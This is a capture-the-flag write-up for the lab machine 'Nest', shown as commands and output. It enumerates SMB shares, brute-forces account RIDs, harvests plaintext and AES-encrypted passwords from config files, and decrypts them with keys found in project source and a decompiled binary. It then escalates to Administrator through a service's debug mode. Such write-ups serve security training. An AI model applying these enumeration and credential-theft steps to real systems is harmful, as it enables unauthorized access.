MACHINE - NEST

OPEN PORTS

```
$ nmap -sVC -T4 -Pn ${IP}
       STATE SERVICE
PORT
                            VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
Help:
      Reporting Service V1.2
      This service allows users to run queries against databases
     AVAILABLE COMMANDS ---
     LIST
     SETDIR <Directory_Name>
     RUNQUERY <Query ID>
     DEBUG <Password>
     HELP <Command>
Host script results:
smb2-security-mode:
    2:1:0:
     Message signing enabled but not required
smb2-time:
   date: 2024-05-01T11:34:30
_ start_date: 2024-05-01T11:32:24
```

INVESTIGATING THE SHARES

• Since only port 445 is open, let's try to enumerate all shares

```
Sharename
                Type
                          Comment
_____
                ----
                          _____
ADMIN$
                Disk
                          Remote Admin
C$
                Disk
                          Default share
Data
                Disk
IPC$
                IPC
                          Remote IPC
Secure$
                Disk
Users
                Disk
```

\$ smbclient -N -L //\${IP}

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• Those that are accessible without credentials are Users and Data

• If we try to access Users share we can find a number of users

```
$ smbclient -N \\\\${IP}\\Users
smb: \> dir
                        0 Fri Aug 9 17:08:23 2019
Administrator
               D
C.Smith
               D
                       0 Sun Jan 26 08:21:44 2020
                       0 Thu Aug 8 19:03:01 2019
L.Frost
               D
R.Thompson
               D
                       0 Thu Aug 8 19:02:50 2019
                       0 Thu Aug 8 00:55:56 2019
TempUser
               D
```

- However, if we try to list content inside each of these folders, we obtain ACCESS_DENIED error.
- At this point, let's enter the second share, i.e., Data

```
$ smbclient -N \\\\${IP}\\Data
smb: \> dir
               D
                        0 Thu Aug 8 00:53:46 2019
               D
                        0 Thu Aug 8 00:53:46 2019
. .
               D
                        0 Thu Aug 8 00:58:07 2019
IT
               D
Production
                        0 Mon Aug 5 23:53:38 2019
Reports
               D
                        0 Mon Aug 5 23:53:44 2019
Shared
               D
                           Wed Aug 7 21:07:51 2019
smb: \> cd Shared
smb: \Shared\> dir
               D
                        0 Wed Aug 7 21:07:51 2019
                        0 Wed Aug 7 21:07:51 2019
               D
Maintenance
               D
                        0 Wed Aug 7 21:07:32 2019
Templates
               D
                        0 Wed Aug 7 21:08:07 2019
smb: \Shared\> cd Maintenance
smb: \Shared\Maintenance\> ls
                       D
                                0 Wed Aug 7 21:07:32 2019
                                   Wed Aug 7 21:07:32 2019
Maintenance Alerts.txt A
                               48 Tue Aug 6 01:01:44 2019
smb: \Shared\Maintenance\> get "Maintenance Alerts.txt"
```

- Opening the downloaded file, we see that there is nothing interesting
- Let's go on

```
smb: \Shared\Maintenance\> cd ..
smb: \Shared\> cd Templates
smb: \Shared\Templates\> ls
```

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- Marketing folder is empty
- In the Welcome Email.txt we can find some useful informations
- 1. User home folder \\htb-NEST\\users\\<\user\amble\
- 2. Credentials TempUser:welcome2019
- Let's use these credentials
- First we can use these credentials to brute force all RIDs

```
$ crackmapexec smb ${IP} -u TempUser -p welcome2019 --rid-brute

SMB 10.10.10.178 445 HTB-NEST 500: HTB-NEST\Administrator (SidTypeUser)

SMB 10.10.10.178 445 HTB-NEST 501: HTB-NEST\Guest (SidTypeUser)

SMB 10.10.10.178 445 HTB-NEST 513: HTB-NEST\None (SidTypeGroup)

SMB 10.10.10.178 445 HTB-NEST 1002: HTB-NEST\TempUser (SidTypeUser)

SMB 10.10.10.178 445 HTB-NEST 1004: HTB-NEST\C.Smith (SidTypeUser)

SMB 10.10.10.178 445 HTB-NEST 1005: HTB-NEST\Service_HQK (SidTypeUser)
```

- Then let's use these credentials to access non accessible Shares on Data
- In Data\IT\Config\NotepadPlusPlus\ there are some configurations
- In particular in config.xml we can find these references

- Referring to files that have been modified recently
- In Data\IT\Config\RU Scanner\RU_config.xml we can find some credentials

```
<ConfigFile>
  <Port>389</port>
  <Username>c.smith</Username>
```

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```
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=
```

- Referring to a specified port: 389 (possibly opened on the local host)
- At this point, we also have a Share path \\HTB-NEST\Secure\$\IT\Carl\
- Let's see if we can access to this path using TempUser

```
$ smbclient \\\${IP}\\Secure$ -U TempUser
smb: \> cd IT\Carl
smb: \IT\Carl\>
```

We can. At this point we can mount the share locally to examine the content

```
$ sudo mount -t cifs -o ro,username=TempUser,password=welcome2019 '//${IP}/Secure$' ./tmp
$ cd tmp
tmp$ cd IT/Carl/VB\ Projects/WIP/RU
tmp/IT/Carl/VB\ Projects/WIP/RU:$
```

- Inside this folder there is the Visual Basic Project for RU
- Ruscanner.sln is the configuration file for this project
- Folder Ruscanner contains the entire project
- We can open that folder inside an IDE, like VScode, it will be easy to inspect source code
- Inside this folder, we can find a Module1.vb file

```
Module Module1
```

```
Sub Main()
    Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
    Dim test As New SsoIntegration With {
        .Username = Config.Username, _
        .Password = Utils.DecryptString(Config.Password)
    }
End Sub
```

End Module

- As we can see, it first open the RU_Config.xml that we have previously found
- Then it uses a function Utils.DecryptString to decrypt the password
- Inside Utils.vb we can find

Public Shared Function DecryptString(EncryptedString As String) As String

If String.IsNullOrEmpty(EncryptedString) Then

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Return String. Empty

```
Else
        Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
    End If
End Function
and
Public Shared Function Decrypt(ByVal cipherText As String, _
                               ByVal passPhrase As String, _
                               ByVal saltValue As String, _
                               ByVal passwordIterations As Integer, _
                               ByVal initVector As String,
                               ByVal keySize As Integer) _
                           As String
    Dim initVectorBytes As Byte()
    initVectorBytes = Encoding.ASCII.GetBytes(initVector)
    Dim saltValueBytes As Byte()
    saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
    Dim cipherTextBytes As Byte()
    cipherTextBytes = Convert.FromBase64String(cipherText)
    Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                        saltValueBytes, _
                                        passwordIterations)
    Dim keyBytes As Byte()
    keyBytes = password.GetBytes(CInt(keySize / 8))
    Dim symmetricKey As New AesCryptoServiceProvider
    symmetricKey.Mode = CipherMode.CBC
    Dim decryptor As ICryptoTransform
    decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
    Dim memoryStream As IO.MemoryStream
    memoryStream = New IO.MemoryStream(cipherTextBytes)
    Dim cryptoStream As CryptoStream
    cryptoStream = New CryptoStream(memoryStream, _
                                    decryptor, _
                                    CryptoStreamMode.Read)
    Dim plainTextBytes As Byte()
    ReDim plainTextBytes(cipherTextBytes.Length)
```

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Return plainText

End Function

- Which is the decrypt function
- Since this file uses .NET functions is can be rewritten in any .NET language
- Hence, we can just create a simple version in C# and compile it with mono
- Let's call this file script.cs

```
$ sudo apt-get install -y mono-mcs mono-runtime
$ mcs script.cs
$ ./script.cs
Plaintext: xRxRxPANCAK3SxRxRx
```

- Now, we have this new set of credentials c.smith:xRxRxPANCAK3SxRxRx
- Let's connect to the User share as C.smith
- Inside Users\C.Smith\ there is user flag user.txt
- There is also a folder named HQK Reporting containing a HQK_Config_Backup.xml

```
<ServiceSettings>
     <Port>4386</Port>
     <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>
```

- There is also another file name Debug Mode Password which seems to be empty
- It is strange that we have found an empty file

```
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"

altname: DEBUGM~1.TXT

create_time: Fri Aug 9 01:06:12 AM 2019 CEST
access_time: Fri Aug 9 01:06:12 AM 2019 CEST
```

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```
write_time: Fri Aug 9 01:08:17 AM 2019 CEST
change_time: Wed Jul 21 08:47:12 PM 2021 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
smb: \C.Smith\HQK Reporting\> exit
$ cat "Debug Mode Password.txt:Password"
WBQ201953D8w
```

- We have a password ... It will be used later on I suppose
- There is also an executable at \AD Integration Module\HqkLdap.exe

PRIVILEGE ESCALATION

First thing, we can try to connect to the port 4386 using telnet

```
$ telnet ${IP} 4386
> help
This service allows users to run queries against databases
using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
> LIST
Use the query ID numbers below with the RUNQUERY command and the
directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] COMPARISONS
     Invoices (Ordered By Customer)
      Products Sold (Ordered By Customer)
[2]
[3]
      Products Sold In Last 30 Days
Current Directory: ALL QUERIES
```

• Using the XML above, we understand we are in C:\Program Files\HQK\ALL QUERIES

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• Hence using SETDIR COMPARISIONS we move to C:\Program Files\HQK\ALL QUERIES\COMPARISIONS

- It seems that we can move through folders of the underline system
- Let's see if we can move to C:\Program Files\HQK

```
> SETDIR ..
> LIST
QUERY FILES IN CURRENT DIRECTORY

[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.installState
[3] HQK Config.xml
```

- It seems that we can move between folders of the remote host
- However, running any specified query gives just an error message

Invalid database configuration found. Please contact your system administrator

- There is only one last command DEBUG <password>
- Running HELP DEBUG gives the following output

```
DEBUG <Password>
```

Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed

Examples:

DEBUG MyPassw0rd Attempts to enable debug mode by using the password "MyPassw0rd"

• We can try to use the password we have previously found

```
> DEBUG WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional
commands that are now available
> HELP
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
```

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```
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
```

- Inside folder C:\Program Files\HQK\LDAP there is a file Ldap.conf
- Running SHOWQUERY 2 gives us the following result

```
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
```

- Iteresting, now we have an encrypted version of the Administrator password
- In the same folder there is also an executable HqkLdap.exe
- This executable is the same we found previously.
- We can try to see if inspecting the Executable we can find some answers
- First thing we can use a tool called Detect-It-Easy (DIE)
- This tool gives us some informations
- 1. Compiled with VB.NET (meaning that the programming language is BASIC)
- 2. It is no packed
- 3. Library used is .NET (v4.0.30319)
- 4. The operating system is Windows(95)
- 5. The entry point is at address 0x00404e2e and the base address is 0x00400000
- This tool gives us some basic informations
- To get a more deeper understanding we need to use decompilers
- Notice that, since it is a .NET-based executable we have to use decompilers like dnSpy or Codermex
- For the purpose of this problem I will use Codermex
- Once opened, if we look at HqkLdap module we can see the DS function
- It does the decryption by calling another function RD.
- A quick comparision shows that this function and the one in Utils.vb are the same
- Hence we can re-use the previous script just changing the password.
- The new line will be

```
Decrypt(
    "yyEq0Uvvhq2uQ0cWG8peLoeRQehqip/fKdeG/kjEVb4=",
    "667912", "1313Rf99", 3,
```

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```
"1L1SA61493DRV53Z", 256
```

- Then we compile, execute and obtain XtH4nkS4P14y1nGX
- At this point we can log as Administrator in the SMB client in the Users share
- Once in the share, under Administrator we find a file flag.txt Shortcut.lnk
- If we donwload this file and inspect it using the file command

flag.txt - Shortcut.lnk: MS Windows shortcut, Points to a file or directory,
Has Relative path, Has Working directory, Unicoded, HasEnvironment
"\\Htb-nest\c\$\Users\Administrator\Desktop\flag.txt"

- We see that the real file is under the c\$ share
- Get access to the share

```
$ smbclient -U Administrator \\\${IP}\\C$
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\DEsktop\> get root.txt
smb: \Users\Administrator\DEsktop\> exit
$ cat root.txt
<ROOT-FLAG>
```

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